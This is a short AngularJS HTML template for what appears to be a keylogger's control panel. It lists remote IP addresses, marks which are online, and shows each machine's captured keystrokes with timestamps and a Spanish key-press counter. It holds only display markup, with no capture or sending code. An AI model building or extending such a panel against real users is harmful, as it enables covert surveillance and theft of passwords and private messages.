<header>
<h1>map[<span>keys</span>]</h1>
</header>
<section class="wrapper" ng-controller="DashboardController">
<article class="dashboard" ng-switch on="step">
  <div class="tabs">
    <ul>
        <li ng-repeat="ip in ips" 
            ng-class="{active: step==ip.step}"
            ng-click="$parent.step=ip.step"> 
            <p ng-class="{online: online[ip.ip]}">{{ ip.ip }}</p>
        </li>
    </ul>
  </div>
  <div class="main-content">
    <div class="window" ng-repeat="ip in ips" ng-show="step==ip.step" scroll-glue>
      <p ng-repeat="k in ip.keys"
         ng-model="res"
         ng-init="res=keyMod(k)"
         ng-show="res">{{ res }}<br><span ng-bind="time(k.time)"></span></p>
        <p class="count">Teclas presionadas: {{ ip.keys.length}}</p>
    </div>
    <div class="buttons">
      <button class="guardar">Guardar</button>
      <button class="eliminar">Eliminar</button>
    </div>
    
  </div>
</article>
</section>
